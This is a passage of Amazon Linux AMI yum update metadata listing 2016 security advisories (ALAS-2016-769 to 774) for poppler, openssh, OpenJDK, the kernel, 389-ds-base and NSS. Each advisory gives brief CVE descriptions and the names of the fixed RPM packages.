release="0.47.rc1.51.amzn1" epoch="32" arch="x86_64"><filename>Packages/bind-utils-9.8.2-0.47.rc1.51.amzn1.x86_64.rpm</filename></package><package name="bind" version="9.8.2" release="0.47.rc1.51.amzn1" epoch="32" arch="i686"><filename>Packages/bind-9.8.2-0.47.rc1.51.amzn1.i686.rpm</filename></package><package name="bind-sdb" version="9.8.2" release="0.47.rc1.51.amzn1" epoch="32" arch="i686"><filename>Packages/bind-sdb-9.8.2-0.47.rc1.51.amzn1.i686.rpm</filename></package><package name="bind-chroot" version="9.8.2" release="0.47.rc1.51.amzn1" epoch="32" 
arch="i686"><filename>Packages/bind-chroot-9.8.2-0.47.rc1.51.amzn1.i686.rpm</filename></package><package name="bind-debuginfo" version="9.8.2" release="0.47.rc1.51.amzn1" epoch="32" arch="i686"><filename>Packages/bind-debuginfo-9.8.2-0.47.rc1.51.amzn1.i686.rpm</filename></package><package name="bind-utils" version="9.8.2" release="0.47.rc1.51.amzn1" epoch="32" arch="i686"><filename>Packages/bind-utils-9.8.2-0.47.rc1.51.amzn1.i686.rpm</filename></package><package name="bind-devel" version="9.8.2" release="0.47.rc1.51.amzn1" epoch="32" arch="i686"><filename>Packages/bind-devel-9.8.2-0.47.rc1.51.amzn1.i686.rpm</filename></package><package name="bind-libs" version="9.8.2" release="0.47.rc1.51.amzn1" epoch="32" arch="i686"><filename>Packages/bind-libs-9.8.2-0.47.rc1.51.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2016-769</id><title>Amazon Linux AMI 2014.03 - ALAS-2016-769: medium priority package update for poppler</title><issued date="2016-11-18 12:30:00" /><updated date="2016-11-18 12:30:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2015-8868:
A heap-buffer overflow was found in the poppler library. An attacker could create a malicious PDF file that would cause applications that use poppler (such as Evince) to crash or, potentially, execute arbitrary code when opened.
1326225:
CVE-2015-8868 poppler: heap buffer overflow in ExponentialFunction
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-8868" title="" id="CVE-2015-8868" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="poppler-debuginfo" version="0.22.5" release="6.16.amzn1" epoch="0" arch="x86_64"><filename>Packages/poppler-debuginfo-0.22.5-6.16.amzn1.x86_64.rpm</filename></package><package name="poppler-utils" version="0.22.5" release="6.16.amzn1" epoch="0" arch="x86_64"><filename>Packages/poppler-utils-0.22.5-6.16.amzn1.x86_64.rpm</filename></package><package name="poppler-glib" version="0.22.5" release="6.16.amzn1" epoch="0" arch="x86_64"><filename>Packages/poppler-glib-0.22.5-6.16.amzn1.x86_64.rpm</filename></package><package name="poppler" version="0.22.5" release="6.16.amzn1" epoch="0" arch="x86_64"><filename>Packages/poppler-0.22.5-6.16.amzn1.x86_64.rpm</filename></package><package name="poppler-cpp" version="0.22.5" release="6.16.amzn1" epoch="0" arch="x86_64"><filename>Packages/poppler-cpp-0.22.5-6.16.amzn1.x86_64.rpm</filename></package><package name="poppler-glib-devel" version="0.22.5" release="6.16.amzn1" epoch="0" arch="x86_64"><filename>Packages/poppler-glib-devel-0.22.5-6.16.amzn1.x86_64.rpm</filename></package><package name="poppler-devel" version="0.22.5" release="6.16.amzn1" epoch="0" arch="x86_64"><filename>Packages/poppler-devel-0.22.5-6.16.amzn1.x86_64.rpm</filename></package><package name="poppler-cpp-devel" version="0.22.5" release="6.16.amzn1" epoch="0" arch="x86_64"><filename>Packages/poppler-cpp-devel-0.22.5-6.16.amzn1.x86_64.rpm</filename></package><package name="poppler-cpp-devel" version="0.22.5" release="6.16.amzn1" epoch="0" arch="i686"><filename>Packages/poppler-cpp-devel-0.22.5-6.16.amzn1.i686.rpm</filename></package><package name="poppler-glib" version="0.22.5" release="6.16.amzn1" epoch="0" arch="i686"><filename>Packages/poppler-glib-0.22.5-6.16.amzn1.i686.rpm</filename></package><package 
name="poppler-devel" version="0.22.5" release="6.16.amzn1" epoch="0" arch="i686"><filename>Packages/poppler-devel-0.22.5-6.16.amzn1.i686.rpm</filename></package><package name="poppler" version="0.22.5" release="6.16.amzn1" epoch="0" arch="i686"><filename>Packages/poppler-0.22.5-6.16.amzn1.i686.rpm</filename></package><package name="poppler-cpp" version="0.22.5" release="6.16.amzn1" epoch="0" arch="i686"><filename>Packages/poppler-cpp-0.22.5-6.16.amzn1.i686.rpm</filename></package><package name="poppler-debuginfo" version="0.22.5" release="6.16.amzn1" epoch="0" arch="i686"><filename>Packages/poppler-debuginfo-0.22.5-6.16.amzn1.i686.rpm</filename></package><package name="poppler-glib-devel" version="0.22.5" release="6.16.amzn1" epoch="0" arch="i686"><filename>Packages/poppler-glib-devel-0.22.5-6.16.amzn1.i686.rpm</filename></package><package name="poppler-utils" version="0.22.5" release="6.16.amzn1" epoch="0" arch="i686"><filename>Packages/poppler-utils-0.22.5-6.16.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2016-770</id><title>Amazon Linux AMI 2014.03 - ALAS-2016-770: medium priority package update for openssh</title><issued date="2016-11-18 12:30:00" /><updated date="2016-11-18 12:30:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2015-8325:
It was discovered that the OpenSSH sshd daemon fetched PAM environment settings before running the login program. In configurations with UseLogin=yes and the pam_env PAM module configured to read user environment settings, a local user could use this flaw to execute arbitrary code as root.
1328012:
CVE-2015-8325 openssh: privilege escalation via user's PAM environment and UseLogin=yes
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-8325" title="" id="CVE-2015-8325" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="pam_ssh_agent_auth" version="0.9.3" release="9.31.62.amzn1" epoch="0" arch="x86_64"><filename>Packages/pam_ssh_agent_auth-0.9.3-9.31.62.amzn1.x86_64.rpm</filename></package><package name="openssh-debuginfo" version="6.6.1p1" release="31.62.amzn1" epoch="0" arch="x86_64"><filename>Packages/openssh-debuginfo-6.6.1p1-31.62.amzn1.x86_64.rpm</filename></package><package name="openssh" version="6.6.1p1" release="31.62.amzn1" epoch="0" arch="x86_64"><filename>Packages/openssh-6.6.1p1-31.62.amzn1.x86_64.rpm</filename></package><package name="openssh-ldap" version="6.6.1p1" release="31.62.amzn1" epoch="0" arch="x86_64"><filename>Packages/openssh-ldap-6.6.1p1-31.62.amzn1.x86_64.rpm</filename></package><package name="openssh-server" version="6.6.1p1" release="31.62.amzn1" epoch="0" arch="x86_64"><filename>Packages/openssh-server-6.6.1p1-31.62.amzn1.x86_64.rpm</filename></package><package name="openssh-keycat" version="6.6.1p1" release="31.62.amzn1" epoch="0" arch="x86_64"><filename>Packages/openssh-keycat-6.6.1p1-31.62.amzn1.x86_64.rpm</filename></package><package name="openssh-clients" version="6.6.1p1" release="31.62.amzn1" epoch="0" arch="x86_64"><filename>Packages/openssh-clients-6.6.1p1-31.62.amzn1.x86_64.rpm</filename></package><package name="openssh-clients" version="6.6.1p1" release="31.62.amzn1" epoch="0" arch="i686"><filename>Packages/openssh-clients-6.6.1p1-31.62.amzn1.i686.rpm</filename></package><package name="openssh-debuginfo" version="6.6.1p1" release="31.62.amzn1" epoch="0" arch="i686"><filename>Packages/openssh-debuginfo-6.6.1p1-31.62.amzn1.i686.rpm</filename></package><package name="openssh-keycat" version="6.6.1p1" release="31.62.amzn1" epoch="0" 
arch="i686"><filename>Packages/openssh-keycat-6.6.1p1-31.62.amzn1.i686.rpm</filename></package><package name="openssh-ldap" version="6.6.1p1" release="31.62.amzn1" epoch="0" arch="i686"><filename>Packages/openssh-ldap-6.6.1p1-31.62.amzn1.i686.rpm</filename></package><package name="openssh-server" version="6.6.1p1" release="31.62.amzn1" epoch="0" arch="i686"><filename>Packages/openssh-server-6.6.1p1-31.62.amzn1.i686.rpm</filename></package><package name="pam_ssh_agent_auth" version="0.9.3" release="9.31.62.amzn1" epoch="0" arch="i686"><filename>Packages/pam_ssh_agent_auth-0.9.3-9.31.62.amzn1.i686.rpm</filename></package><package name="openssh" version="6.6.1p1" release="31.62.amzn1" epoch="0" arch="i686"><filename>Packages/openssh-6.6.1p1-31.62.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2016-771</id><title>Amazon Linux AMI 2014.03 - ALAS-2016-771: important priority package update for java-1.7.0-openjdk</title><issued date="2016-11-18 12:30:00" /><updated date="2016-11-18 12:30:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2016-5597:
A flaw was found in the way the Networking component of OpenJDK handled HTTP proxy authentication. A Java application could possibly expose HTTPS server authentication credentials via a plain text network connection to an HTTP proxy if the proxy asked for authentication.
1386103:
CVE-2016-5597 OpenJDK: exposure of server authentication credentials to proxy (Networking, 8160838)
CVE-2016-5582:
It was discovered that the Hotspot component of OpenJDK did not properly check the arguments of the System.arraycopy() function in certain cases. An untrusted Java application or applet could use this flaw to corrupt the virtual machine&#039;s memory and completely bypass Java sandbox restrictions.
1385402:
CVE-2016-5582 OpenJDK: incomplete type checks of System.arraycopy arguments (Hotspot, 8160591)
CVE-2016-5573:
It was discovered that the Hotspot component of OpenJDK did not properly check received Java Debug Wire Protocol (JDWP) packets. An attacker could possibly use this flaw to send debugging commands to a Java program running with debugging enabled if they could make the victim&#039;s browser send HTTP requests to the JDWP port of the debugged application.
1385544:
CVE-2016-5573 OpenJDK: insufficient checks of JDWP packets (Hotspot, 8159519)
CVE-2016-5554:
A flaw was found in the way the JMX component of OpenJDK handled classloaders. An untrusted Java application or applet could use this flaw to bypass certain Java sandbox restrictions.
1385714:
CVE-2016-5554 OpenJDK: insufficient classloader consistency checks in ClassLoaderWithRepository (JMX, 8157739)
CVE-2016-5542:
It was discovered that the Libraries component of OpenJDK did not restrict the set of algorithms used for JAR integrity verification. This flaw could allow an attacker to modify the content of a JAR file that used a weak signing key or hash algorithm.
1385723:
CVE-2016-5542 OpenJDK: missing algorithm restrictions for jar verification (Libraries, 8155973)
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-5542" title="" id="CVE-2016-5542" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-5554" title="" id="CVE-2016-5554" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-5573" title="" id="CVE-2016-5573" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-5582" title="" id="CVE-2016-5582" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-5597" title="" id="CVE-2016-5597" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="java-1.7.0-openjdk-debuginfo" version="1.7.0.121" release="2.6.8.1.69.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.7.0-openjdk-debuginfo-1.7.0.121-2.6.8.1.69.amzn1.x86_64.rpm</filename></package><package name="java-1.7.0-openjdk-devel" version="1.7.0.121" release="2.6.8.1.69.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.7.0-openjdk-devel-1.7.0.121-2.6.8.1.69.amzn1.x86_64.rpm</filename></package><package name="java-1.7.0-openjdk-src" version="1.7.0.121" release="2.6.8.1.69.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.7.0-openjdk-src-1.7.0.121-2.6.8.1.69.amzn1.x86_64.rpm</filename></package><package name="java-1.7.0-openjdk" version="1.7.0.121" release="2.6.8.1.69.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.7.0-openjdk-1.7.0.121-2.6.8.1.69.amzn1.x86_64.rpm</filename></package><package name="java-1.7.0-openjdk-javadoc" version="1.7.0.121" release="2.6.8.1.69.amzn1" epoch="1" arch="noarch"><filename>Packages/java-1.7.0-openjdk-javadoc-1.7.0.121-2.6.8.1.69.amzn1.noarch.rpm</filename></package><package name="java-1.7.0-openjdk-demo" version="1.7.0.121" release="2.6.8.1.69.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.7.0-openjdk-demo-1.7.0.121-2.6.8.1.69.amzn1.x86_64.rpm</filename></package><package 
name="java-1.7.0-openjdk-debuginfo" version="1.7.0.121" release="2.6.8.1.69.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.7.0-openjdk-debuginfo-1.7.0.121-2.6.8.1.69.amzn1.i686.rpm</filename></package><package name="java-1.7.0-openjdk-devel" version="1.7.0.121" release="2.6.8.1.69.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.7.0-openjdk-devel-1.7.0.121-2.6.8.1.69.amzn1.i686.rpm</filename></package><package name="java-1.7.0-openjdk-demo" version="1.7.0.121" release="2.6.8.1.69.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.7.0-openjdk-demo-1.7.0.121-2.6.8.1.69.amzn1.i686.rpm</filename></package><package name="java-1.7.0-openjdk-src" version="1.7.0.121" release="2.6.8.1.69.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.7.0-openjdk-src-1.7.0.121-2.6.8.1.69.amzn1.i686.rpm</filename></package><package name="java-1.7.0-openjdk" version="1.7.0.121" release="2.6.8.1.69.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.7.0-openjdk-1.7.0.121-2.6.8.1.69.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2016-772</id><title>Amazon Linux AMI 2014.03 - ALAS-2016-772: important priority package update for kernel</title><issued date="2016-12-06 23:44:00" /><updated date="2016-12-07 19:04:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2016-9084:
The use of a kzalloc with an integer multiplication allowed an integer overflow condition to be reached in vfio_pci_intrs.c. This combined with CVE-2016-9083 may allow an attacker to craft an attack and use unallocated memory, potentially crashing the machine.
1389259:
CVE-2016-9084 kernel: Integer overflow when using kzalloc in vfio driver
CVE-2016-9083:
A flaw was discovered in the Linux kernel&#039;s implementation of VFIO. An attacker issuing an ioctl can create a situation where memory is corrupted and modify memory outside of the expected area. This may overwrite kernel memory and subvert kernel execution.
1389258:
CVE-2016-9083 kernel: State machine confusion bug in vfio driver leading to memory corruption
CVE-2016-8655:
A race condition issue leading to a use-after-free flaw was found in the way the raw packet sockets implementation in the Linux kernel networking subsystem handled synchronization while creating the TPACKET_V3 ring buffer. A local user able to open a raw packet socket (requires the CAP_NET_RAW capability) could use this flaw to elevate their privileges on the system.
1400019:
CVE-2016-8655 kernel: Race condition in packet_set_ring leads to use after free
CVE-2016-8645:
It was discovered that the Linux kernel since 3.6-rc1, with &#039;net.ipv4.tcp_fastopen&#039; set to 1, can hit a BUG() statement in the tcp_collapse() function after a number of certain syscalls are made, leading to a possible system crash.
1393904:
CVE-2016-8645 kernel: a BUG() statement can be hit in net/ipv4/tcp_input.c
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-8645" title="" id="CVE-2016-8645" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-8655" title="" id="CVE-2016-8655" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-9083" title="" id="CVE-2016-9083" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-9084" title="" id="CVE-2016-9084" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="kernel-tools" version="4.4.35" release="33.55.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-4.4.35-33.55.amzn1.x86_64.rpm</filename></package><package name="perf-debuginfo" version="4.4.35" release="33.55.amzn1" epoch="0" arch="x86_64"><filename>Packages/perf-debuginfo-4.4.35-33.55.amzn1.x86_64.rpm</filename></package><package name="kernel-headers" version="4.4.35" release="33.55.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-headers-4.4.35-33.55.amzn1.x86_64.rpm</filename></package><package name="kernel-tools-devel" version="4.4.35" release="33.55.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-devel-4.4.35-33.55.amzn1.x86_64.rpm</filename></package><package name="perf" version="4.4.35" release="33.55.amzn1" epoch="0" arch="x86_64"><filename>Packages/perf-4.4.35-33.55.amzn1.x86_64.rpm</filename></package><package name="kernel-debuginfo-common-x86_64" version="4.4.35" release="33.55.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-debuginfo-common-x86_64-4.4.35-33.55.amzn1.x86_64.rpm</filename></package><package name="kernel" version="4.4.35" release="33.55.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-4.4.35-33.55.amzn1.x86_64.rpm</filename></package><package name="kernel-devel" version="4.4.35" release="33.55.amzn1" epoch="0" 
arch="x86_64"><filename>Packages/kernel-devel-4.4.35-33.55.amzn1.x86_64.rpm</filename></package><package name="kernel-debuginfo" version="4.4.35" release="33.55.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-debuginfo-4.4.35-33.55.amzn1.x86_64.rpm</filename></package><package name="kernel-tools-debuginfo" version="4.4.35" release="33.55.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-debuginfo-4.4.35-33.55.amzn1.x86_64.rpm</filename></package><package name="kernel-debuginfo-common-i686" version="4.4.35" release="33.55.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-debuginfo-common-i686-4.4.35-33.55.amzn1.i686.rpm</filename></package><package name="perf-debuginfo" version="4.4.35" release="33.55.amzn1" epoch="0" arch="i686"><filename>Packages/perf-debuginfo-4.4.35-33.55.amzn1.i686.rpm</filename></package><package name="kernel-tools" version="4.4.35" release="33.55.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-4.4.35-33.55.amzn1.i686.rpm</filename></package><package name="perf" version="4.4.35" release="33.55.amzn1" epoch="0" arch="i686"><filename>Packages/perf-4.4.35-33.55.amzn1.i686.rpm</filename></package><package name="kernel" version="4.4.35" release="33.55.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-4.4.35-33.55.amzn1.i686.rpm</filename></package><package name="kernel-tools-debuginfo" version="4.4.35" release="33.55.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-debuginfo-4.4.35-33.55.amzn1.i686.rpm</filename></package><package name="kernel-headers" version="4.4.35" release="33.55.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-headers-4.4.35-33.55.amzn1.i686.rpm</filename></package><package name="kernel-debuginfo" version="4.4.35" release="33.55.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-debuginfo-4.4.35-33.55.amzn1.i686.rpm</filename></package><package name="kernel-tools-devel" version="4.4.35" release="33.55.amzn1" epoch="0" 
arch="i686"><filename>Packages/kernel-tools-devel-4.4.35-33.55.amzn1.i686.rpm</filename></package><package name="kernel-devel" version="4.4.35" release="33.55.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-devel-4.4.35-33.55.amzn1.i686.rpm</filename></package><package name="kernel-doc" version="4.4.35" release="33.55.amzn1" epoch="0" arch="noarch"><filename>Packages/kernel-doc-4.4.35-33.55.amzn1.noarch.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2016-773</id><title>Amazon Linux AMI 2014.03 - ALAS-2016-773: medium priority package update for 389-ds-base</title><issued date="2016-12-15 00:28:00" /><updated date="2016-12-15 23:48:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2016-5416:
It was found that 389 Directory Server was vulnerable to a flaw in which the default ACI (Access Control Instructions) could be read by an anonymous user. This could lead to leakage of sensitive information.
1349540:
CVE-2016-5416 389-ds-base: ACI readable by anonymous user
CVE-2016-5405:
It was found that 389 Directory Server was vulnerable to a remote password disclosure via a timing attack. A remote attacker could possibly use this flaw to retrieve a directory server password after many tries.
1358865:
CVE-2016-5405 389-ds-base: Password verification vulnerable to timing attack
CVE-2016-4992:
An information disclosure flaw was found in 389 Directory Server. A user with no access to objects in a certain LDAP sub-tree could send LDAP ADD operations with a specific object name. The error message returned to the user was different based on whether the target object existed or not.
1347760:
CVE-2016-4992 389-ds-base: Information disclosure via repeated use of LDAP ADD operation
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-4992" title="" id="CVE-2016-4992" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-5405" title="" id="CVE-2016-5405" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-5416" title="" id="CVE-2016-5416" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="389-ds-base" version="1.3.5.10" release="11.49.amzn1" epoch="0" arch="x86_64"><filename>Packages/389-ds-base-1.3.5.10-11.49.amzn1.x86_64.rpm</filename></package><package name="389-ds-base-snmp" version="1.3.5.10" release="11.49.amzn1" epoch="0" arch="x86_64"><filename>Packages/389-ds-base-snmp-1.3.5.10-11.49.amzn1.x86_64.rpm</filename></package><package name="389-ds-base-libs" version="1.3.5.10" release="11.49.amzn1" epoch="0" arch="x86_64"><filename>Packages/389-ds-base-libs-1.3.5.10-11.49.amzn1.x86_64.rpm</filename></package><package name="389-ds-base-debuginfo" version="1.3.5.10" release="11.49.amzn1" epoch="0" arch="x86_64"><filename>Packages/389-ds-base-debuginfo-1.3.5.10-11.49.amzn1.x86_64.rpm</filename></package><package name="389-ds-base-devel" version="1.3.5.10" release="11.49.amzn1" epoch="0" arch="x86_64"><filename>Packages/389-ds-base-devel-1.3.5.10-11.49.amzn1.x86_64.rpm</filename></package><package name="389-ds-base-debuginfo" version="1.3.5.10" release="11.49.amzn1" epoch="0" arch="i686"><filename>Packages/389-ds-base-debuginfo-1.3.5.10-11.49.amzn1.i686.rpm</filename></package><package name="389-ds-base-devel" version="1.3.5.10" release="11.49.amzn1" epoch="0" arch="i686"><filename>Packages/389-ds-base-devel-1.3.5.10-11.49.amzn1.i686.rpm</filename></package><package name="389-ds-base-snmp" version="1.3.5.10" release="11.49.amzn1" epoch="0" arch="i686"><filename>Packages/389-ds-base-snmp-1.3.5.10-11.49.amzn1.i686.rpm</filename></package><package name="389-ds-base" 
version="1.3.5.10" release="11.49.amzn1" epoch="0" arch="i686"><filename>Packages/389-ds-base-1.3.5.10-11.49.amzn1.i686.rpm</filename></package><package name="389-ds-base-libs" version="1.3.5.10" release="11.49.amzn1" epoch="0" arch="i686"><filename>Packages/389-ds-base-libs-1.3.5.10-11.49.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2016-774</id><title>Amazon Linux AMI 2014.03 - ALAS-2016-774: medium priority package update for nss-util nss nss-softokn</title><issued date="2016-12-15 00:32:00" /><updated date="2016-12-15 23:52:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2016-8635:
It was found that Diffie Hellman client key exchange handling in NSS was vulnerable to a small subgroup confinement attack. An attacker could use this flaw to recover private keys by confining the client DH key to a small subgroup of the desired group.
1391818:
CVE-2016-8635 nss: small-subgroups attack flaw
CVE-2016-5285:
A NULL pointer dereference flaw was found in the way NSS handled invalid Diffie-Hellman keys. A remote client could use this flaw to crash a TLS/SSL server using NSS.
1383883:
CVE-2016-5285 nss: Missing NULL check in PK11_SignWithSymKey / ssl3_ComputeRecordMACConstantTime causes server crash
CVE-2016-2834:
Multiple buffer handling flaws were found in the way NSS handled cryptographic data from the network. A remote attacker could use these flaws to crash an application using NSS or, possibly, execute arbitrary code with the permission of the user running the application.
1347908:
CVE-2016-2834 nss: Multiple security flaws (MFSA 2016-61)
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-2834" title="" id="CVE-2016-2834" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-5285" title="" id="CVE-2016-5285" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-8635" title="" id="CVE-2016-8635" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="nss-util" version="3.21.3" release="1.1.51.amzn1" epoch="0" arch="x86_64"><filename>Packages/nss-util-3.21.3-1.1.51.amzn1.x86_64.rpm</filename></package><package name="nss-util-devel" version="3.21.3" release="1.1.51.amzn1" epoch="0" arch="x86_64"><filename>Packages/nss-util-devel-3.21.3-1.1.51.amzn1.x86_64.rpm</filename></package><package name="nss-util-debuginfo" version="3.21.3" release="1.1.51.amzn1" epoch="0" arch="x86_64"><filename>Packages/nss-util-debuginfo-3.21.3-1.1.51.amzn1.x86_64.rpm</filename></package><package name="nss-util" version="3.21.3" release="1.1.51.amzn1" epoch="0" arch="i686"><filename>Packages/nss-util-3.21.3-1.1.51.amzn1.i686.rpm</filename></package><package name="nss-util-debuginfo" version="3.21.3" release="1.1.51.amzn1" epoch="0" arch="i686"><filename>Packages/nss-util-debuginfo-3.21.3-1.1.51.amzn1.i686.rpm</filename></package><package name="nss-util-devel" version="3.21.3" release="1.1.51.amzn1" epoch="0" arch="i686"><filename>Packages/nss-util-devel-3.21.3-1.1.51.amzn1.i686.rpm</filename></package><package name="nss-sysinit" version="3.21.3" release="2.77.amzn1" epoch="0" arch="x86_64"><filename>Packages/nss-sysinit-3.21.3-2.77.amzn1.x86_64.rpm</filename></package><package name="nss-pkcs11-devel" version="3.21.3" release="2.77.amzn1" epoch="0" arch="x86_64"><filename>Packages/nss-pkcs11-devel-3.21.3-2.77.amzn1.x86_64.rpm</filename></package><package name="nss-tools" version="3.21.3" release="2.77.amzn1" epoch="0" 
arch="x86_64"><filename>Packages/nss-tools-3.21.3-2.77.amzn1.x86_64.rpm</filename></package><package name="nss" version="3.21.3" release="2.77.amzn1" epoch="0" arch="x86_64"><filename>Packages/nss-3.21.3-2.77.amzn1.x86_64.rpm</filename></package><package name="nss-devel" version="3.21.3" release="2.77.amzn1" epoch="0" arch="x86_64"><filename>Packages/nss-devel-3.21.3-2.77.amzn1.x86_64.rpm</filename></package><package name="nss-debuginfo" version="3.21.3" release="2.77.amzn1" epoch="0" arch="x86_64"><filename>Packages/nss-debuginfo-3.21.3-2.77.amzn1.x86_64.rpm</filename></package><package name="nss-debuginfo" version="3.21.3" release="2.77.amzn1" epoch="0" arch="i686"><filename>Packages/nss-debuginfo-3.21.3-2.77.amzn1.i686.rpm</filename></package><package name="nss-tools" version="3.21.3" release="2.77.amzn1" epoch="0" arch="i686"><filename>Packages/nss-tools-3.21.3-2.77.amzn1.i686.rpm</filename></package><package name="nss-devel" version="3.21.3" release="2.77.amzn1" epoch="0" arch="i686"><filename>Packages/nss-devel-3.21.3-2.77.amzn1.i686.rpm</filename></package><package name="nss-sysinit" version="3.21.3" release="2.77.amzn1" epoch="0" arch="i686"><filename>Packages/nss-sysinit-3.21.3-2.77.amzn1.i686.rpm</filename></package><package name="nss-pkcs11-devel" version="3.21.3" release="2.77.amzn1" epoch="0" arch="i686"><filename>Packages/nss-pkcs11-devel-3.21.3-2.77.amzn1.i686.rpm</filename></package><package name="nss" version="3.21.3" release="2.77.amzn1" epoch="0" arch="i686"><filename>Packages/nss-3.21.3-2.77.amzn1.i686.rpm</filename></package><package name="nss-softokn-devel" version="3.16.2.3" release="14.4.39.amzn1" epoch="0" arch="x86_64"><filename>Packages/nss-softokn-devel-3.16.2.3-14.4.39.amzn1.x86_64.rpm</filename></package><package name="nss-softokn-freebl" version="3.16.2.3" release="14.4.39.amzn1" epoch="0" arch="x86_64"><filename>Packages/nss-softokn-freebl-3.16.2.3-14.4.39.amzn1.x86_64.rpm</filename></package><package name="nss-softokn-debuginfo" 
version="3.16.2.3" release="14.4.39.amzn1" epoch="0" arch="x86_64"><filename>Packages/nss-softokn-debuginfo-3.16.2.3-14.4.39.amzn1.x86_64.rpm</filename></package><package name="nss-softokn-freebl-devel" version="3.16.2.3" release="14.4.39.amzn1" epoch="0" arch="x86_64"><filename>Packages/nss-softokn-freebl-devel-3.16.2.3-14.4.39.amzn1.x86_64.rpm</filename></package><package name="nss-softokn" version="3.16.2.3" release="14.4.39.amzn1" epoch="0" arch="x86_64"><filename>Packages/nss-softokn-3.16.2.3-14.4.39.amzn1.x86_64.rpm</filename></package><package name="nss-softokn" version="3.16.2.3" release="14.4.39.amzn1" epoch="0" arch="i686"><filename>Packages/nss-softokn-3.16.2.3-14.4.39.amzn1.i686.rpm</filename></package><package name="nss-softokn-freebl" version="3.16.2.3" release="14.4.39.amzn1" epoch="0" arch="i686"><filename>Packages/nss-softokn-freebl-3.16.2.3-14.4.39.amzn1.i686.rpm</filename></package><package name="nss-softokn-debuginfo" version="3.16.2.3" release="14.4.39.amzn1" epoch="0" arch="i686"><filename>Packages/nss-softokn-debuginfo-3.16.2.3-14.4.39.amzn1.i686.rpm</filename></package><package name="nss-softokn-freebl-devel" version="3.16.2.3" release="14.4.39.amzn1" epoch="0" arch="i686"><filename>Packages/nss-softokn-freebl-devel-3.16.2.3-14.4.39.amzn1.i686.rpm</filename></package><package name="nss-softokn-devel" version="3.16.2.3" release="14.4.39.amzn1" epoch="0" arch="i686"><filename>Packages/nss-softokn-devel-3.16.2.3-14.4.39.amzn1.i686.rpm</filename></package></collection></pkglist></update><update 